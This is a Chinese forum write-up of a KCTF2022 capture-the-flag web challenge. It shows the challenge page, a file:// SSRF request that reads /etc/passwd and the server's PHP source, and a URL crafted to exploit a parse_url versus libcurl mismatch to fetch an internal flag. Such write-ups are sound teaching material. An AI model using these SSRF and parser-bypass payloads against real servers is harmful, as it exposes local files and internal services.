首页
论坛
课程
招聘
[原创]KCTF2022 Q1 第四题 飞蛾扑火
2022-5-16 22:41 4013

[原创]KCTF2022 Q1 第四题 飞蛾扑火

2022-5-16 22:41
4013

KCTF2022 Q1 第四题 飞蛾扑火

考点:ssrf & url bypass

1
2
3
4
5
6
7
8
9
10
<html>
<head>
<meta charset="utf-8">
<title>欢迎挑战 Design by 香草</title>
</head>
<body>
<!--phpinfo.php-->
<img src="url.php?url=https://ctf.pediy.com/upload/team/762/team236762.png">
</body>
</html>

看到phpinfo.phpurl.php

 

想到ssrf
file协议:http://121.36.145.157:8044/url.php?url=file://127.0.0.1/etc/passwd
能读取到passwd

 

读取下url.php

1
curl http://121.36.145.157:8044/url.php?url=file://127.0.0.1/var/www/html/url.php

主干

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$url=$_GET["url"];
$uu=parse_url($url);
$host=isset($uu["host"])?$uu["host"]:"";
$scheme=isset($uu["scheme"])?$uu["scheme"]:"";
if(empty($host)){
        die("host is null");
}
if(empty($scheme)){
        die("scheme is null");
}
 
//https://ctf.pediy.com/upload/team/762/team236762.png?
if($host=="ctf.pediy.com"||$host=="127.0.0.1"||$host=="localhost"){
//echo curl_request("http://123.57.254.42/flag.php","get",[],true,5);//get flag
  echo curl_request($url,'',"get",[],true,5);
 
}else{
die("host not allow");
}

需要绕过parse_url和libcurl

 

构造url:http://121.36.145.157:8044/url.php?url=123.57.254.42://ctf.pediy.com/../flag.php

 

得到flag:flag{xxx_999()xx*@eeEEE}


看雪招聘平台创建简历并且简历完整度达到90%及以上可获得500看雪币~

收藏
点赞0
打赏
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回